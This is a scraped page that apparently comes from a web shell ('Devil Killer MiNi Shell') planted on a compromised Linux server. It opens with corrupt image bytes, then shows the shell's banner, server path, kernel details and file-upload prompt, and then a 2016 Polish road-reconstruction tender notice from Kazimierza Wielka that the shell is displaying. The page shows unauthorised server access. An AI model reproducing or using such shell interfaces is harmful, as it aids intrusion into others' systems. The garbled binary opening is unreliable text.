JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160926/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160926/313114-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 313114 - 2016
              z dnia 2016-09-26 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kazimierza Wielka: Przebudowa dróg powiatowych z podziałem na zadania:
Zadanie nr 1 Przebudowa drogi powiatowej nr 0504 T przez  wieś Sielec od km 3+128 do km 4+234
Zadanie nr 2  Przebudowa drogi powiatowej nr 0518 T Topola  Słonowice  od km 4+126 do km 5+676 <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zarząd Powiatu Kazimierskiego, krajowy numer identyfikacyjny
              29100945500000, ul.
              ul. Tadeusza Kościuszki 
              12,
              28500  
              Kazimierza Wielka, woj.
              świętokrzyskie, państwo
              , tel.
              041 3502300, 3502321, e-mail
              starostwo_kw@poczta.onet.pl, faks
              413 502 313.
              <br />
              Adres strony internetowej (URL): <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />bip.kazimierzaw.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />bip.kazimierzaw.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Starostwo Powiatwe w Kazimierzy Wielkie, ul. T. Kościuszki 12, 28-500 Kazimierza Wielka pokój 106 sekretariat<br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przebudowa dróg powiatowych z podziałem na zadania:
Zadanie nr 1 Przebudowa drogi powiatowej nr 0504 T przez  wieś Sielec od km 3+128 do km 4+234
Zadanie nr 2  Przebudowa drogi powiatowej nr 0518 T Topola  Słonowice  od km 4+126 do km 5+676 <br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zadanie nr 1   Przebudowa drogi powiatowej nr 0504 T przez  wieś Sielec od km 3+128 do km 4+234
Zakres realizowanej inwestycji obejmuje:


1) Roboty ziemne 
- Mechaniczna ścinka poboczy średniej gr. 10 cm, szerokość 1,0 m z wywozem urobku do  3 km. 1849,00 m2
2) Roboty rozborkowe
- Mechaniczne frezowanie nawierzchni średnia grubość 5 cm.  713,70 m2
- Ręczne rozebranie krawężników betonowych ułożonych na ławie betonowej. 271 mb
- Ręczne rozebranie chodnika z płyt  50x50x7cm. 165,00 m2
3) Elementy ulic
- Krawężniki betonowe wibroprasowane o wymiarach 15x30 cm z wykonaniem ław betonowych z oporem z betonu C12/ 15 na podsypce cementowo-piaskowej  206 mb

4) Zjazdy 
  Przełożenie nawierzchni z kostki betonowej brukowej na wjazdach z regulacją wysokościową na podsypce cementowo-piaskowej. 1,43 m2
5) Elementy odwodnienia:
- Ułożenie ścieku przy krawędzi jezdni z korytka półokrągłego 60x33x15cm  na ławie betonowej C12/15.65,00 mb,
- Studnia z kręgów o śr. 1000 mm z osadnikiem i z wpustem ściekowym, głęb. 2,0 m.  - 1 kpl.
- Wykonanie przyłączy z rur betonowych zbrojonych WIPRO z izolacją bitumiczną o średnicy 20 cm na ławie tłuczniowej gr. 20 cm, wraz z zagęszczeniem oraz wykonanie naziomu i podbudowy. Dług. 15,0 mb
- Odmulenie istniejących rowów z wyprofilowaniem dna i skarp , z namułu i gruntu śr.gł. od 30 do 50 cm wraz z uzupełnieniem i wyrównaniem poboczy oraz wywozem nadmiaru ziemi do 3 km.  - 300 mb
- Odmulenie przepustów pod zjazdami o średnicy  50 cm /zamulenie śr.60% światła/- 7 m
- Wykonanie przepustów pod zjazdami z rur żelbetowych o średnicy  50cm na ławie z kruszywa gr.15cm,    dług. 5,0 m
6)  Nawierzchnia
 Wykonanie warstwy wyrównawczej z betonu asfaltowego w ilości 100 kg/m2, ruch KR 2; 630,41 t
- Wykonanie warstwy ścieralnej z betonu asfaltowego grubość warstwy po zagęszczeniu 4cm, ruch KR
- 6 304,10 m2.
- Wykonanie warstwy ścieralnej z betonu asfaltowego grubość warstwy po zagęszczeniu 5cm, ruch KR 2, na wjazdach  88 m2
- Pobocze utwardzone z betonu asfaltowego,warstwa ścieralna śr. grub. 5cm po zagęszczeniu, szerokość 1,0m; 44,0  m2
7)  Roboty wykończeniowe
 Utwardzenie zjazdów w granicach pasa drogowego materiałem kamiennym 0-31,5 mm, gr. 10 cm, 99,00 m2
- Umocnienie poboczy materiałem kamiennym   0-31,5mm gr.10cm szer. 0,75m.  - 1386,75 m2

Zadanie nr 2 - Przebudowa drogi powiatowej nr 0518 T Topola  Słonowice  od km 4+126 do km 5+676
Zakres realizowanej inwestycji obejmuje:
1) Roboty ziemne i przygotowawcze
  Mechaniczna ścinka poboczy średniej gr. 10 cm, szerokość 0,5 m oraz 0,75m  z wywozem urobku do  3 km.  1970,50 m2
- Regulacja pionowa studzienek kanalizacyjnych z nadbudową wykonaną betonem. 14 szt.
2) Zjazdy do posesji
  Przełożenie nawierzchni z kostki betonowej brukowej na wjazdach z regulacją wysokościową na podsypce cementowo-piaskowej.40 m2.
- Wykonanie koryta głębokości 30 cm w gruncie kategorii II-IV przy użyciu koparki podsiębiernej o pojemności łyżki 0,25 m3 z transportem urobku samochodami samowyładowczymi na odległość do 5 km- 168,00 m2
- Wykonanie i zagęszczenie warstwy piasku w korycie grubości 10 cm.   - 168,00 m2
- Podbudowa z kruszywa łamanego 0-31,5 mm - grubość warstwy po zagęszczeniu 20 cm.- 168,00 m2
- Utwardzenie zjazdów w granicach pasa drogowego materiałem kamiennym 0-31,5 mm, gr. 10 cm. - 260 m2
3) Elementy odowodnienia:
- Ułożenie ścieku przy krawędzi jezdni z korytka półokrągłego 60x33x15cm  na ławie betonowej C12/15. - 228 mb
- Ułożenie ścieku korytkowego KS-74 prefabrykowanego zbrojonego na ławie betonowej C12/15.- 620 mb
- Przedłużenie przepustu pod drogą z rur o średnicy 60cm - 1,0 mb oraz wykonanie ścianki czołowej na mokro - 1 szt. dla przepustu z rur o śr. 60cm + oczyszczenie przepustu z rur fi 60 na długości 7m (zamulenie 40%) 
- Odmulenie istniejących rowów z wyprofilowaniem dna i skarp , z namułu i gruntu śr.gł. 50 cm wraz z uzupełnieniem i wyrównaniem poboczy oraz wywozem nadmiaru ziemi do 3 km.  - 1727 mb
- Wykonanie przepustów pod zjazdami z rur żelbetowych o średnicy  50cm na ławie z kruszywa gr.15cm. - 44,00 m
4) Wzmocnienie podłoża pod pobocza utwardzone w km 5+036 do km 5+676 
  Koryta gł. 45 cm wykonywane w gruntach kat. II-IV na poszerzeniach jezdni przy użyciu koparki podsiębiernej o pojemności łyżki 0,25m3 ziemia na uzupełnienie poboczy nadmiar ziemi z odwozem samochodami na odległość do 1 km  640,00 m2
-Wykonanie i zagęszczane mechanicznie warstwy piasku w korycie na poszerzeniu o gr.15 cm. -320 m2
- Podbudowa z kruszywa łamanego 31,5-63 mm warstwa dolna o grubości 20 cm po zagęszczeniu  320 m2
- Podbudowa z kruszywa łamanego 0-31,5 mm warstwa górna o grubości 10 cm po zagęszczeniu. - 320 m2
5) Nawierzchnia:
- Wykonanie warstwy wyrównawczej z betonu asfaltowego w ilości 100 kg/m2, ruch KR 2; 789,50t
- Wykonanie warstwy ścieralnej z betonu asfaltowego grubość warstwy po zagęszczeniu 4cm, ruch KR 2;- 7895,00 m2
- Wykonanie warstwy ścieralnej z betonu asfaltowego grubość warstwy po zagęszczeniu 5cm, ruch KR 2  183,00 m2
- Geosiatka na połączeniu istniejącej nawierzchni i dobudowanej ,szerokości 1 m - geosiatki, o wytrzymałości na rozciąganie &gt; lub równy 20 kN/m i wydłużeniu przy zerwaniu wzdłuż pasma &lt; lub równy10%.- 2 812 m2
6) Roboty wykończeniowe  pobocza:
- Umocnienie poboczy materiałem kamiennym   0-31,5mm gr.10cm szer. 0,5m i szer. 0,75m.  - 1970,50 m2
- Powierzchniowe utrwalanie nawierzchni drogowych (na poboczach)emulsją asfaltową przy użyciu grysu kamiennego frakcji 5-8. Ilość kruszywa 8,0 dm3/m2.   - 1970,50 m2<br /><br /><b>II.5) Główny kod CPV: </b>45233000-9<br /><b> Dodatkowe kody CPV:</b>45111000-8,
                45112000-5,
                45233000-0<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zmawiający przewiduje jednokrotne udzielenie zamówień powtarzających w przypadku pozyskania środków finansowych na ten cel<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 10/12/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Na potwierdzenie należy złożyć: oświadczenie zgodnie  założeniami w pkt. 9,3 SIWZ - Zamawiający w tym zakresie nie stawia żadnych wymagań <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Na potwierdzenie należy złożyć: oświadczenie zgodnie  założeniami w pkt. 9,3 SIWZ - Zamawiający w tym zakresie nie stawia żadnych wymagań <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a) wykonanych robót
Na potwierdzenie niniejszego warunku należy złożyć wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty; 
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że w tym okresie wykonał:
Dla zadania 1
dwie roboty budowlane każda związana z budową lub przebudową lub rozbudową dróg o nawierzchni z mieszanki mineralno-asfaltowej lub remontem dróg gdzie w ramach remontu dokonano wymiany nawierzchni z mieszanki mineralno-asfaltowej. Wymagana  wartości każdej z dwóch wykonanych robót budowlanych wynosiła minimum                  300 000,00 zł brutto.
Dla zadania 2 
dwie roboty budowlane każda związana z budową lub przebudową lub rozbudową dróg o nawierzchni z mieszanki mineralno-asfaltowej lub remontem dróg gdzie w ramach remontu dokonano wymiany nawierzchni z mieszanki mineralno-asfaltowej. Wymagana  wartości każdej z dwóch wykonanych robót budowlanych wynosiła minimum   600 000,00 zł brutto
Do każdej pozycji wykazu należy załączyć dowody określające, czy roboty te zostały wykonane w sposób należyty, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i  prawidłowo ukończone.
	
Tym samym doświadczeniem można wykazać się tylko do jednego zadania.

b)    wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia publicznego.
Na potwierdzenie niniejszego warunku należy złożyć wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje n/w osobami:

Dla zadania 1
Kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami w specjalności drogowej
oraz  
minimum 1 osobą zatrudnioną przez cały okres realizacji inwestycji w pełnym wymiarze czasu pracy na umowę o pracę, którzy bezpośrednio będą związani z wykonywanymi robotami drogowymi (pracownicy fizyczni oraz operatorzy używanego sprzętu).

Dla zadania 2
Kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami w specjalności drogowej
oraz  
minimum 1 osobą zatrudnioną przez cały okres realizacji inwestycji w pełnym wymiarze czasu pracy na umowę o pracę, którzy bezpośrednio będą związani z wykonywanymi robotami drogowymi (pracownicy fizyczni oraz operatorzy używanego sprzętu).

Do oferty w stosunku do kierownika budowy należy dołączyć oświadczenie Wykonawcy, że zaproponowana osoba posiada wymagane uprawnienia i przynależy do właściwej izby samorządu zawodowego jeżeli taki wymóg na te osoby nakłada Prawo budowlane.

Zgodnie z art. 12a Prawa budowlanego  który to odsyła do ustawy z dnia 18 marca 2008 r.  o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z dnia 17 kwietnia 2008 r. ze zm.) przynależność do  właściwej izby samorządu zawodowego nie jest wymagana od obywateli państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) gdyż do posiadania uprawnień w wykonywaniu samodzielnych funkcji w budownictwie nie jest wymagana przynależności do izby samorządu zawodowego.

Tym samy Kierownikiem budowy można wykazać się dla wszystkich zadań.  W odniesieniu dla pracowników fizycznych tymi samymi osobami można wykazać się tylko do jednego zadania.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia, o których mowa w art. 24 ustawy, wykonawca złoży oświadczenie o braku podstaw wykluczenia oraz przedłoży na potwierdzenie następujące dokumenty;
a) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt.1 ustawy;
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa powyżej , składa odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,

b) Dokumenty, o których mowa powyżej w pkt. a) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

c) Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt. a), zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Przepis pkt. b) stosuje się odpowiednio.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Opis warunków podmiotowych i sposobu dokonywania oceny spełniania tych warunków oraz braku podstaw do wykluczenia;	
- kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów;
Na potwierdzenie należy złożyć: oświadczenie zgodnie z założeniami w pkt.   Zamawiający w tym zakresie nie stawia żadnych wymagań
 zdolności technicznej lub zawodowej;
a) wykonanych robót
